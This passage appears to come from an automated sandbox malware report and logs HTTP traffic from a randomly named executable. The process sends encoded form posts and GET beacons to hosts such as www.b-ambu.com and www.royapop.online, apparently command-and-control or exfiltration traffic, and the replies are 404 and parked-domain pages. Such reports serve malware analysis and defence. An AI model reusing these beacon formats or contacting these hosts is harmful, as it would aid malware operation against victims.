                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 6b 78 74 66 6c 74 78 45 62 56 47 33 79 39 50 34 59 55 51 77 35 44 62 58 55 31 65 79 30 6f 70 69 73 69 4f 35 56 2f 55 48 56 4c 4c 4a 78 31 47 72 63 6f 2f 7a 52 6c 52 6d 54 68 69 45 62 55 33 68 74 5a 65 6f 78 48 4e 75 74 6c 45 31 39 35 30 44 59 75 4b 6b 56 47 6a 43 78 43 52 47 38 6a 79 66 35 72 4d 37 43 57 79 76 4d 75 65 53 5a 44 62 65 76 6b 59 32 73 57 4a 32 70 47 57 58 62 2b 63 72 34 35 73 4f 56 79 55 4a 77 70 55 6e 53 39 4c 72 79 79 46 33 70 49 2b 4f 4a 6a 4a 50 72 6f 76 46 47 6e 56 73 31 63 61 64 2b 67 6a 6c 58 78 37 72 67 43 35 6a 7a 68 65 6e 62 71 4f 76 35 4a 62 46 51 43 4a 7a 64 42 7a 32 56 34 49 41 47 41 31 49 34 37 47 35 65 39 4f 38 59 39 33 39 62 57 73 57 59 73 53 35 75 4c 51 38 41 46 2b 45 45 33 42 59 66 43 43 67 37 50 63 64 61 62 6c 49 47 34 6c 48 41 4e 48 74 43 31 74 37 66 33 6d 78 4e 6a 36 62 6d 72 59 6e 61 4a 4a 47 2b 58 57 50 4a 53 79 37 49 44 55 42 37 30 52 35 72 59 45 6e 4d 70 67 65 52 71 33 48 52 47 46 50 52 65 69 79 75 37 7a 61 57 31 48 6c 46 59 72 6a 6e 42 4e 75 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=kxtfltxEbVG3y9P4YUQw5DbXU1ey0opisiO5V/UHVLLJx1Grco/zRlRmThiEbU3htZeoxHNutlE1950DYuKkVGjCxCRG8jyf5rM7CWyvMueSZDbevkY2sWJ2pGWXb+cr45sOVyUJwpUnS9LryyF3pI+OJjJProvFGnVs1cad+gjlXx7rgC5jzhenbqOv5JbFQCJzdBz2V4IAGA1I47G5e9O8Y939bWsWYsS5uLQ8AF+EE3BYfCCg7PcdablIG4lHANHtC1t7f3mxNj6bmrYnaJJG+XWPJSy7IDUB70R5rYEnMpgeRq3HRGFPReiyu7zaW1HlFYrjnBNuikH/cHAbszP4f5rhaC+3cdml8cNfMHY4SqxZqZjOLN/5yWb2vun7bgAWDM8ZaH3wYhiaYE4LZbGRfzUxSZX6OJTFRv3NFprnQvZf+1j7mmMKiwxv+7+lrW+6qfl6g9DuTutquj3W03UXYzSvJH/u53PuaHwgoOOvwY+sdwANcKnBEVUa3hNQ6FRONLCIVzmwkoy/OzktsGUmWNQQ7Y/p6vdH70Cy6UPFnEjqtfMqb/FNzXfyaXM7B/7KXnKdJIC8F+HiXea66px17ddXZf24yuCfoBY/Pidfq8+cbpMIrvwLh3R0t7KdgYF6IPwldQbx6lrt/z6zyrBS4Kxjyfa0iq/NhuqndJXzLkqkXLGUVkv4KE9nGyrGl0blNr4zioet/TQuFJjnU85nFWaDS57lAFOFOChao12UJx0HhhiEmMiYmaSRqhipbwuMTtOHOiVpXfoS7qkfJb1pV4aTzC7jsbbdMUokqrE8LrtUMD/ik/5Td8F4AEko839CbLKl3JkHUSvhySjHfYjmbogueY4tTV8PdIv4CXSIR8eE6aYZStv3cFTFaDxMcH/toPUjm3HLNpqSdcHgEaEKDgdeDo3yM0UjcmIrVyzMw9XUZtwT+THHLkuoImLPRG+pZsILV02BjF3DtOhGR34+bXzx2YZ0oR3mcENNEt5JLU [TRUNCATED]
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:50.580857038 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:18:50 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              20192.168.2.550002209.74.64.190802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:52.464195013 CEST484OUTGET /elh0/?7Bohe=pzF/mZhnV0GSmLX+GycMwU6WT06CzqVGvQudBfY4Dqjs/3KtcpfJYGVadgWONk/4osLjzgZwgHUQ0ZwKAvTdTnbY8Qd/xTrHuaQfE1OzRfvOWlfeun0LuB51rXnhStJusg==&vD=h0e85v HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.royapop.online
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:53.154932976 CEST548INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:18:53 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              21192.168.2.55000384.32.84.32802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:06.576262951 CEST734OUTPOST /deo6/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.b-ambu.com
                                                                                                                                                                                                                                              Origin: http://www.b-ambu.com
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.b-ambu.com/deo6/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 41 44 61 68 42 67 75 6a 54 65 63 73 30 70 67 49 46 4c 46 6d 61 43 4d 30 70 56 48 72 38 4c 77 67 4b 73 66 59 74 33 5a 6c 64 39 76 39 46 45 58 33 51 32 73 49 6b 68 6f 37 4f 36 30 48 68 58 4e 59 56 6d 55 41 78 4b 77 56 73 57 4a 72 73 38 5a 2b 7a 4e 38 34 6b 7a 72 53 78 61 77 71 44 36 5a 54 64 53 59 70 38 54 2b 75 54 4f 44 58 38 76 53 51 6e 4d 76 6d 77 36 5a 30 4b 42 6a 68 58 4a 59 47 4c 43 79 58 4e 67 47 71 4c 2f 6c 48 52 74 48 39 42 6d 6a 2b 72 62 64 62 69 58 5a 41 58 34 4c 69 68 38 4d 65 30 4a 57 69 79 4f 37 54 4d 51 6d 32 4e 4d 47 6e 77 47 4b 72 35 51 34 72 46 67 44 2b 49 6b 4e 74 66 41 30 3d
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=ADahBgujTecs0pgIFLFmaCM0pVHr8LwgKsfYt3Zld9v9FEX3Q2sIkho7O60HhXNYVmUAxKwVsWJrs8Z+zN84kzrSxawqD6ZTdSYp8T+uTODX8vSQnMvmw6Z0KBjhXJYGLCyXNgGqL/lHRtH9Bmj+rbdbiXZAX4Lih8Me0JWiyO7TMQm2NMGnwGKr5Q4rFgD+IkNtfA0=


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              22192.168.2.55000484.32.84.32802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:09.124147892 CEST754OUTPOST /deo6/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.b-ambu.com
                                                                                                                                                                                                                                              Origin: http://www.b-ambu.com
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.b-ambu.com/deo6/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 41 44 61 68 42 67 75 6a 54 65 63 73 6d 34 51 49 4a 4d 78 6d 64 69 4d 31 6e 31 48 72 31 72 77 6b 4b 73 54 59 74 79 34 36 63 50 4c 39 4c 42 54 33 52 30 45 49 6e 68 6f 37 57 4b 30 47 72 33 4e 48 56 6d 49 35 78 49 30 56 73 53 70 72 73 35 39 2b 7a 39 41 37 72 44 72 51 36 36 77 6f 4f 61 5a 54 64 53 59 70 38 54 61 45 54 4f 37 58 39 62 75 51 32 5a 44 6e 39 61 5a 7a 44 68 6a 68 64 70 59 43 4c 43 79 35 4e 68 61 41 4c 39 64 48 52 74 58 39 41 30 4c 39 68 62 64 5a 6d 58 59 42 58 4a 4b 6c 76 4e 6f 72 7a 70 6a 2b 75 64 37 51 4a 6d 4c 63 58 75 4f 50 6a 6d 6d 54 70 44 77 63 55 51 69 58 53 48 64 64 42 58 67 73 49 54 42 56 35 78 2f 55 68 30 64 58 4c 43 62 41 51 56 69 75
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=ADahBgujTecsm4QIJMxmdiM1n1Hr1rwkKsTYty46cPL9LBT3R0EInho7WK0Gr3NHVmI5xI0VsSprs59+z9A7rDrQ66woOaZTdSYp8TaETO7X9buQ2ZDn9aZzDhjhdpYCLCy5NhaAL9dHRtX9A0L9hbdZmXYBXJKlvNorzpj+ud7QJmLcXuOPjmmTpDwcUQiXSHddBXgsITBV5x/Uh0dXLCbAQViu


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              23192.168.2.55000584.32.84.32802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:11.667177916 CEST1771OUTPOST /deo6/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.b-ambu.com
                                                                                                                                                                                                                                              Origin: http://www.b-ambu.com
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
                                                                                                                                                                                                                                              Referer: http://www.b-ambu.com/deo6/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 41 44 61 68 42 67 75 6a 54 65 63 73 6d 34 51 49 4a 4d 78 6d 64 69 4d 31 6e 31 48 72 31 72 77 6b 4b 73 54 59 74 79 34 36 63 50 44 39 4c 33 76 33 51 56 45 49 6d 68 6f 37 49 36 30 44 72 33 4d 62 56 6d 41 39 78 49 6f 76 73 55 6c 72 2b 76 68 2b 36 76 6b 37 38 7a 72 51 31 61 77 6c 44 36 5a 38 64 53 49 58 38 54 71 45 54 4f 37 58 39 61 2b 51 6d 38 76 6e 75 71 5a 30 4b 42 6a 6c 58 4a 5a 58 4c 43 71 50 4e 67 75 36 4b 4a 68 48 53 4e 6e 39 4e 6e 6a 39 38 4c 64 48 68 58 5a 53 58 4d 53 71 76 4e 6b 52 7a 70 6e 55 75 64 44 51 4c 58 71 59 48 63 47 48 33 57 33 30 73 67 67 74 4b 67 6d 52 53 42 5a 4c 42 32 30 36 48 6a 64 33 70 78 37 4f 31 32 51 6f 51 45 76 57 47 77 4f 6b 67 4b 77 46 77 4c 52 63 7a 39 45 56 36 4f 54 78 77 54 33 6b 53 79 7a 56 6f 6c 61 45 30 65 47 62 53 4e 48 32 54 55 41 41 76 74 71 6f 4c 30 71 73 34 53 2b 55 32 77 79 7a 46 77 4c 34 42 4d 57 53 30 32 37 6d 2b 75 34 34 41 6c 46 6a 6c 4b 49 46 6b 59 55 4d 73 4f 6a 63 34 6d 50 4c 6c 76 67 4b 78 71 68 59 6a 50 47 67 35 45 37 68 6f 75 45 35 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=ADahBgujTecsm4QIJMxmdiM1n1Hr1rwkKsTYty46cPD9L3v3QVEImho7I60Dr3MbVmA9xIovsUlr+vh+6vk78zrQ1awlD6Z8dSIX8TqETO7X9a+Qm8vnuqZ0KBjlXJZXLCqPNgu6KJhHSNn9Nnj98LdHhXZSXMSqvNkRzpnUudDQLXqYHcGH3W30sggtKgmRSBZLB206Hjd3px7O12QoQEvWGwOkgKwFwLRcz9EV6OTxwT3kSyzVolaE0eGbSNH2TUAAvtqoL0qs4S+U2wyzFwL4BMWS027m+u44AlFjlKIFkYUMsOjc4mPLlvgKxqhYjPGg5E7houE5/QlohQOI/yZFO0aQR/RGxMoV6FBlPk3GKwyRQlehZlLuVfdrh2HN8JcotzzdrpxnNeeyQzbk2EEtbhLHQmkEjyKG8HCd61+mBWEIjNVH1/j9r87oiTxcGrF9X/yvKRO7i4yIDEf75f3sFMub4ZZ+pD4l2nDXr+RT48SeXniUhnimsNXuUfrK+NTpFsTuNFvqDNKspkWZhjtY2qy2Ytap+fUfUCqI+wcHVC5+QX5iNtg4Eim9WCvS4YdpBMLhFEQgQ3geCTVntKV73iU7HmItoVYrb6xYxpjCvzKX1i4NIcqx3D2FrrcymwVqfRb5CQ8iv4OHhRlOZ24CvxMV2PPQRx8ChZXTE/iOKKodt75NS+dY+pwzqx8ZRfrUKky18gr1TrjCVQ8/1Zw+WayRlYciuvodKDGn9oA6SSVRga+Rl8YmFTTCa6RkR1HFCTxGXVukHjYWH7ZGCudZAlya24jPI1wwXxY8xVoU7PgUo4v5NqYDJAOBc5r8aODggTShtaYkmrui2pJ7oVx5RNyokGcBL6ThiVimlrlEeMUrMS4yUYO3xw7Q7IZc+mNHYXzzvo9Z/f2PGs+fjXic2+AL+h/wDgAXbZ9kuj1TJcdB9+yBpe+oYERXd4WdvvLGKouq3ZiflF593exwI7nwX3EHXESG9Yv9JZ1+zyz5P2 [TRUNCATED]


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              24192.168.2.55000684.32.84.32802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:14.209057093 CEST480OUTGET /deo6/?7Bohe=NByBCVC4fvk3zNlObrJyagJtuzfI3YQ4Ad7pkV0ATPDcP1/VdlZwhks7LZ4Zlk95UTsGsfg9gVB7u8RemM4hoUvK2Ig2OY9rZRI88AWKe5yd8pSEv6a6wulMHxqZW9lecA==&vD=h0e85v HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.b-ambu.com
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.027726889 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: hcdn
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:19:14 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 10072
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              x-hcdn-request-id: d663c1a22614092b0ff660635fddd455-int-edge3
                                                                                                                                                                                                                                              Expires: Thu, 24 Oct 2024 13:19:13 GMT
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.027750969 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                                                                                                                                                                                                              Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.027761936 CEST1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                                                                                                                                                                                                                              Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.027821064 CEST1236INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                                                                                                                                                                                                                              Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.027898073 CEST848INData Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c
                                                                                                                                                                                                                                              Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.027909994 CEST1236INData Raw: 63 6c 61 73 73 3d 6d 65 73 73 61 67 65 2d 73 75 62 74 69 74 6c 65 3e 48 61 70 70 79 20 74 6f 20 73 65 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 20 77 69 74 68 20 48 6f 73 74 69 6e 67 65 72 21 3c 2f 64 69 76 3e 3c 70 3e 59 6f 75 72 20 64 6f 6d 61 69
                                                                                                                                                                                                                                              Data Ascii: class=message-subtitle>Happy to see your domain with Hostinger!</div><p>Your domain is active and is using Hostinger nameservers. Take the recommended steps below to continue your journey with Hostinger.</p></div><img src=https://cdn.hostinger
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.027920008 CEST212INData Raw: 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 43 68 61 6e 67 65 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 65 72 76
                                                                                                                                                                                                                                              Data Ascii: stom-wrap"><div class=column-custom><div class=column-title>Change domain nameservers</div><br><p>Manage your domain nameservers in the domain management page of your Hostinger account.</p><br><a href=https://sup
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.027930021 CEST1236INData Raw: 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f 65 6e 2f 61 72 74 69 63 6c 65 73 2f 31 36 39 36 37 38 39 2d 68 6f 77 2d 74 6f 2d 63 68 61 6e 67 65 2d 6e 61 6d 65 73 65 72 76 65 72 73 2d 61 74 2d 68 6f 73 74 69 6e 67 65 72 20 72 65 6c 3d
